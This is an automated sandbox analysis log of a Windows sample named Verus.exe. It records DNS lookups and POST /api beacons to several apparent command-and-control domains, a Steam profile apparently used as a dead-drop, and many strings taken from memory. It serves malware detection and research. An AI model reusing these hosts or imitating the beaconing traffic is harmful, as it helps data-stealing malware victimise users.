Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ehticsprocw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condifendteu.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawwyobstacw.sbs
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=GuC2Zbqa.VDQ6OeaRKUXKu9e65jd8FQJg5PAo5ZMINA-1728891688-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: enginenek.buzz
Source: global traffic	DNS traffic detected: DNS query: mathcucom.sbs
Source: global traffic	DNS traffic detected: DNS query: allocatinow.sbs
Source: global traffic	DNS traffic detected: DNS query: enlargkiw.sbs
Source: global traffic	DNS traffic detected: DNS query: resinedyw.sbs
Source: global traffic	DNS traffic detected: DNS query: vennurviot.sbs
Source: global traffic	DNS traffic detected: DNS query: ehticsprocw.sbs
Source: global traffic	DNS traffic detected: DNS query: condifendteu.sbs
Source: global traffic	DNS traffic detected: DNS query: drawwyobstacw.sbs
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sergei-esenin.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enginenek.buzz

Source: Verus.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: Verus.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Verus.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Verus.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: Verus.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: Verus.exe, 00000000.00000003.1919482655.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micK)
Source: Verus.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Verus.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Verus.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Verus.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: Verus.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: Verus.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: Verus.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: Verus.exe	String found in binary or memory: http://www.FeyTools.com
Source: Verus.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Verus.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: Verus.exe, 00000000.00000003.1899855227.00000000007B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/
Source: Verus.exe, 00000000.00000003.1899855227.00000000007B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/a
Source: Verus.exe, 00000000.00000003.1899855227.00000000007B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/api
Source: Verus.exe, 00000000.00000003.1899855227.00000000007B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/s
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akam
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamsta
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.coD
Source: Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4Ok
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
Source: Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3v/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_resp
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: Verus.exe, 00000000.00000003.1978794248.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condifendteu.sbs/api
Source: Verus.exe, 00000000.00000003.1978794248.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/api
Source: Verus.exe, 00000000.00000003.1978794248.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/api/
Source: Verus.exe, 00000000.00000003.1978794248.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/api7j
Source: Verus.exe, 00000000.00000003.1938818608.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ehticsprocw.sbs/.
Source: Verus.exe, 00000000.00000003.1938818608.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ehticsprocw.sbs/api
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: Verus.exe, 00000000.00000003.1899855227.00000000007B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mathcucom.sbs/
Source: Verus.exe, 00000000.00000003.1919482655.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000002.2123122400.000000000074E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/
Source: Verus.exe, 00000000.00000003.1919482655.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/api
Source: Verus.exe, 00000000.00000003.1978794248.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/
Source: Verus.exe, 00000000.00000003.1978794248.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api
Source: Verus.exe, 00000000.00000002.2123122400.000000000074E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api/Tew
Source: Verus.exe, 00000000.00000002.2123122400.0000000000796000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com:443/apita
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: Verus.exe, 00000000.00000003.1978794248.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: Verus.exe, 00000000.00000003.1978794248.0000000000798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: Verus.exe, 00000000.00000003.1978794248.0000000000798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: Verus.exe, 00000000.00000003.1919567479.00000000007E1000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1919482655.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/J
Source: Verus.exe, 00000000.00000003.1919567479.00000000007E1000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1919482655.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/M
Source: Verus.exe, 00000000.00000003.1919567479.00000000007E1000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1919482655.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/T
Source: Verus.exe, 00000000.00000003.1919567479.00000000007E1000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1919482655.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/_
Source: Verus.exe, 00000000.00000003.1938818608.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978794248.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1919482655.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/api
Source: Verus.exe, 00000000.00000003.1938818608.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978794248.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1919482655.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/apis
Source: Verus.exe, 00000000.00000003.1919567479.00000000007E1000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1919482655.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/q
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: Verus.exe	String found in binary or memory: https://www.entrust.net/rpa0
Source: Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.152.13:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.141.136:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49748 version: TLS 1.2
